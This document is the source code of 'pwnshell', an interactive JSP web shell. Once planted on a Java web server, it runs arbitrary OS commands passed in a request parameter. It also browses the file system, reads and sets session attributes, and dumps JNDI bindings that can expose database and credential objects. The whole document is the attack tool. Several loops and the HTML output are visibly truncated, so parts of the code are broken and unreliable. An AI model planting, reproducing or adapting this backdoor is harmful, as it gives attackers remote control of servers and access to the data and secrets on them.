<% /* pwnshell.jsp - www.i0day.com */ %> <%@page import="java.io.File"%> <%@page import="java.util.List"%> <%@page import="java.util.Date"%> <%@page import="java.util.Arrays"%> <%@page import="java.util.ArrayList"%> <%@page import="java.io.IOException" %> <%@page import="java.io.InputStream" %> <%@page import="java.io.InputStreamReader" %> <%@page import="java.io.BufferedReader" %> <%@page import="java.net.InetAddress" %> <%@page import="javax.naming.*" %> <%@page import="javax.servlet.jsp.PageContext" %> <%@page deferredSyntaxAllowedAsLiteral="true"%> <%! String currentDir = ""; PageContext context; HttpSession currentSession; %> <% if ( session.getAttribute("pwd") == null ) { currentDir = new File(System.getProperty("user.dir")).getCanonicalPath(); session.setAttribute("pwd",currentDir); } else { currentDir = (String)session.getAttribute("pwd"); } context = pageContext; currentSession = session; String cmd = request.getParameter("c"); if ( cmd != null ) { String result = processCmd(cmd); %><%=result%><% session.setAttribute("pwd", new File(currentDir).getCanonicalPath()); return; } %> pwnshell - an interactive jsp shell
<%! private String processCmd(String cmdLine) { String[] tokens = tokenize(cmdLine); if ( tokens.length == 0 ) { return "No command specified."; } String cmd = tokens[0]; String[] args = new String[tokens.length-1]; for(int i=1;i"); } try { p.waitFor(); } catch(InterruptedException e) { } } catch (IOException ioe) { java.io.StringWriter sw = new java.io.StringWriter(); java.io.PrintWriter pw = new java.io.PrintWriter(sw); ioe.printStackTrace(pw); pw.flush(); return replaceNewlines(sw.toString()); } return sb.toString(); } } private String setSession(String[] args) { if ( args.length != 0 && "set".equals(args[0]) ) { if ( args.length == 3 ) { String key = args[1]; String val = args[2]; currentSession.setAttribute(key,val); return show( new String[]{"session", key} ); } else if ( args.length == 4 ) { String key = args[1]; String val = args[2]; String cls = args[3]; boolean foundCls = false; if ( cls.equals("boolean") ) { foundCls = true; currentSession.setAttribute(key, Boolean.valueOf(val)); } else if ( cls.equals("byte") ) { foundCls = true; currentSession.setAttribute(key, Byte.valueOf(val)); } else if ( cls.equals("short") ) { foundCls = true; currentSession.setAttribute(key, Short.valueOf(val)); } else if ( cls.equals("int") ) { foundCls = true; currentSession.setAttribute(key, Integer.valueOf(val)); } else if ( cls.equals("long") ) { foundCls = true; currentSession.setAttribute(key, Long.valueOf(val)); } else if ( cls.equals("float") ) { foundCls = true; currentSession.setAttribute(key, Float.valueOf(val)); } else if ( cls.equals("double") ) { foundCls = true; currentSession.setAttribute(key, Double.valueOf(val)); } if (foundCls) return show( new String[]{"session", key} ); } } StringBuilder sb = new StringBuilder(); sb.append("Usage:
"); sb.append("session set <key> <value> [class]

"); sb.append("The class option is assumed to be String, but can be substituted for any other primitive, e.g., 'int' or 'float'
"); sb.append(""); return sb.toString(); } private String show(String[] args) { if ( args.length > 0 && "session".equals(args[0]) ) { if ( args.length == 1 ) { StringBuilder sb = new StringBuilder(); sb.append(""); sb.append(""); HttpSession session = ((HttpServletRequest)context.getRequest()).getSession(); java.util.Enumeration e = session.getAttributeNames(); while(e.hasMoreElements()) { String key = (String)e.nextElement(); Object obj = session.getAttribute(key); sb.append(""); } sb.append("
KeyClassValue
"); sb.append(key); sb.append(""); sb.append(obj.getClass().getName()); sb.append(""); sb.append(String.valueOf(obj)); sb.append("
"); return sb.toString(); } else if ( args.length == 2 ) { HttpSession session = ((HttpServletRequest)context.getRequest()).getSession(); String key = args[1]; Object obj = session.getAttribute(key); StringBuilder sb = new StringBuilder(); sb.append(""); sb.append(""); if ( obj != null ) { sb.append(""); } else { sb.append(""); } sb.append(""); sb.append("
KeyClassValue
"); sb.append(key); sb.append(""); sb.append(obj.getClass().getName()); sb.append(""); sb.append(String.valueOf(obj)); sb.append("(key not found)
"); return sb.toString(); } } else if ( args.length > 0 && "jndi".equals(args[0]) ) { if ( args.length == 1 ) { try { StringBuilder sb = new StringBuilder(); sb.append(""); sb.append(""); InitialContext ic = new InitialContext(); NamingEnumeration ne = ic.listBindings("java:comp/env"); while(ne.hasMore()) { NameClassPair ncPair = (NameClassPair)ne.next(); String key = ncPair.getName(); String cls = ncPair.getClassName(); sb.append(""); } sb.append("
JDNI NameClassValue
"); sb.append(key); sb.append(""); sb.append(cls); sb.append(""); sb.append(ic.lookup(key)); sb.append("
"); return sb.toString(); } catch (Exception e) { java.io.StringWriter sw = new java.io.StringWriter(); java.io.PrintWriter pw = new java.io.PrintWriter(sw); e.printStackTrace(pw); pw.flush(); return replaceNewlines(sw.toString()); } } else if ( args.length == 2 ) { String key = args[1]; StringBuilder sb = new StringBuilder(); try { InitialContext ic = new InitialContext(); NamingEnumeration ne = ic.listBindings("java:comp/env"); Object obj = ic.lookup(key); sb.append(""); sb.append(""); if ( obj != null ) { sb.append(""); } else { sb.append(""); } sb.append(""); sb.append("
JDNI NameClassValue
"); sb.append(key); sb.append(""); sb.append(obj.getClass().getName()); sb.append(""); sb.append(String.valueOf(obj)); sb.append("(key not found)
"); } catch (Exception e) { return replaceNewlines("" + escape(e.getMessage()) + ""); } return sb.toString(); } } StringBuilder sb = new StringBuilder(); sb.append("Invalid syntax for 'show' command. Usage:
"); sb.append("show session [key]
"); sb.append("show jndi [key]
"); sb.append(""); return sb.toString(); } private String cd(String dir) { try { File d = new File(this.currentDir + File.separator + dir); if ( d.exists() && d.isDirectory() ) { this.currentDir = d.getCanonicalPath(); return ""; } d = new File(dir); if ( d.exists() && d.isDirectory() ) { this.currentDir = d.getCanonicalPath(); return ""; } } catch (IOException ioe) { } return "No such directory: " + escape(dir) + ""; } private String pwd() { return this.currentDir; } private String ls(String[] args) { boolean shouldL = false; boolean shouldA = false; List targets = new ArrayList(); for(int i=0;iOnly -l and -a (or -la/-al) are supported"; } } } else if ( ! new File(args[i]).exists() ) { return "Cannot find specified file/directory: " + escape(args[i]) + ""; } else { targets.add(args[i]); } } if ( targets.size() == 0 ) { String[] lst = new File(currentDir).list(); for(String entry : lst) { targets.add(currentDir + File.separator + entry); } } StringBuffer sb = new StringBuffer(); String entryLen; sb.append(""); for(int i=0,ctr=0;i"); if ( f.isDirectory() ) { String encoded = escape(f.getName()); sb.append(""); sb.append(encoded); sb.append("/"); } else { sb.append(escape(f.getName())); } sb.append(""); if ( shouldL || (ctr != 1 && (ctr % 3) == 0) ) { if ( shouldL ) { sb.append(""); } sb.append(""); if ( i != targets.size() - 1 ) { sb.append(""); } } } sb.append("
"); sb.append(new Date(f.lastModified())); sb.append(""); char[] privs = new char[2]; privs[0] = f.canRead() ? 'R' : '-'; privs[1] = f.canWrite() ? 'W' : '-'; //privs[2] = f.canExecute() ? 'X' : '-'; canExecute() was introduced in 1.6 sb.append(new String(privs)); sb.append(""); sb.append(f.length()); sb.append("
"); return sb.toString(); } private void appendToBuffer(List resultBuffer, StringBuffer buf) { if (buf.length() > 0) { resultBuffer.add(buf.toString()); buf.setLength(0); } } private String[] tokenize(String commandLine) { List resultBuffer = new java.util.ArrayList(); if (commandLine != null) { int z = commandLine.length(); boolean insideQuotes = false; StringBuffer buf = new StringBuffer(); for (int i = 0; i < z; ++i) { char c = commandLine.charAt(i); if (c == '"') { appendToBuffer(resultBuffer, buf); insideQuotes = !insideQuotes; } else if (c == '\\') { if ((z > i + 1) && ((commandLine.charAt(i + 1) == '"') || (commandLine.charAt(i + 1) == '\\'))) { buf.append(commandLine.charAt(i + 1)); ++i; } else { buf.append("\\"); } } else { if (insideQuotes) { buf.append(c); } else { if (Character.isWhitespace(c)) { appendToBuffer(resultBuffer, buf); } else { buf.append(c); } } } } appendToBuffer(resultBuffer, buf); } String[] result = new String[resultBuffer.size()]; return ((String[]) resultBuffer.toArray(result)); } private String escape(String s) { StringBuilder sb = new StringBuilder(); for(int i=0;i' ) sb.append("<"); else if ( c == '"' ) sb.append("""); else if ( c == '&' ) sb.append("&"); else sb.append(c); } return sb.toString(); } private String replaceNewlines(String s) { if ( s == null ) return null; return s.replaceAll(System.getProperty("line.separator"),"
"); } private String getExecutableFromPath(String executableName) { String systemPath = System.getenv("PATH"); String[] pathDirs = systemPath.split(File.pathSeparator); String fullyQualifiedExecutable = null; for (String pathDir : pathDirs) { File file = new File(pathDir, executableName); if (file.isFile()) { fullyQualifiedExecutable = file.getAbsolutePath(); break; } } return fullyQualifiedExecutable; } %>